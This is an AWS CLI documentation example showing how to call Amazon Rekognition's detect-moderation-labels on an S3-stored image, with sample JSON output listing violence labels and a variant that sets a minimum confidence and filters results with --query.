**To detect unsafe content in an image**

The following ``detect-moderation-labels`` command detects unsafe content in the specified image stored in an Amazon S3 bucket. ::

    aws rekognition detect-moderation-labels \
        --image "S3Object={Bucket=MyImageS3Bucket,Name=gun.jpg}"

Output::

    {
        "ModerationModelVersion": "3.0", 
        "ModerationLabels": [
            {
                "Confidence": 97.29618072509766, 
                "ParentName": "Violence", 
                "Name": "Weapon Violence"
            }, 
            {
                "Confidence": 97.29618072509766, 
                "ParentName": "", 
                "Name": "Violence"
            }
        ]
    }

For more information, see `Detecting Unsafe Images <https://docs.aws.amazon.com/rekognition/latest/dg/procedure-moderate-images.html>`__ in the *Amazon Rekognition Developer Guide*.
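
By default, the operation only returns labels it detects with a confidence of about 50 percent or higher. As a rough sketch (assuming the command exposes the API's ``MinConfidence`` parameter as ``--min-confidence``, and reusing the example bucket and object names from above), you can raise that threshold and trim the response with the AWS CLI's global ``--query`` option. ::

    aws rekognition detect-moderation-labels \
        --image "S3Object={Bucket=MyImageS3Bucket,Name=gun.jpg}" \
        --min-confidence 90 \
        --query "ModerationLabels[].{Name:Name,Confidence:Confidence}"

The confidence threshold is applied by the service, while the ``--query`` JMESPath expression is applied client side by the CLI to keep only the label names and confidence scores.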
